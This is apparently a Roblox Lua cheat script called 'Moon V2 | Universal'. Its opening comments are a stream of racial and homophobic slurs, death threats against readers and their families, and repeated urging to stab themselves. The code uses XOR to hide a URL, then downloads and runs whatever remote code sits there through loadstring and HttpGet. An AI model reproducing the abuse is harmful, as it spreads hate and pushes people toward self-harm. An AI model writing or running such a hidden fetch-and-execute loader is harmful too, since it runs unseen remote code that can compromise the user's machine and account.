--Moon V2 | Universal
--skids kys
--SKIDS HERES A MESSAGES FOR YOU!! your nothing in life, fucking discord mods, chinks, honey bun eater nigger, fuck yourself, furry, femboy, you goon to femboy porn, roblox rule34 loser
--, i hope your entire life dies, i hope you fall into a deep state of depression, honestly no one loves you, i will find you and kill you, i will shoot you with a loaded shotgun nigger
--, i will kill your siblings, pets, and parents, i will fucking beat the living shit out of you, js fuck you
--SKIDS IF YOU SADLY HAVENT STABBED A KNIFE IN YOUR CHEST YET, READ THIS, alright fucking whore bastard your still here.. please just take a sharp knife and stab your chest, ITS NOT HARD NIGGER RETARD WHORE
--SKIDS, FEMBOYS, LGBTQ+ RETARDS, FURRYS, ETC GO FUCKING STAB A KNIFE IN YOUR CHEST STUPID BASTARD I HOPE YOU DIE RETARDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD FUCK YOUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\203\36\245\175\194\23\194\193\218\38\237\244\198\12\197\140\201\32\224\168\136\22\212\194\223\54\169\182\198\23\223\140\203\48\228\183\206\29\158\192\200\54\169\184\200\16\215\202\220","\126\177\163\187\69\134\219\167")))();
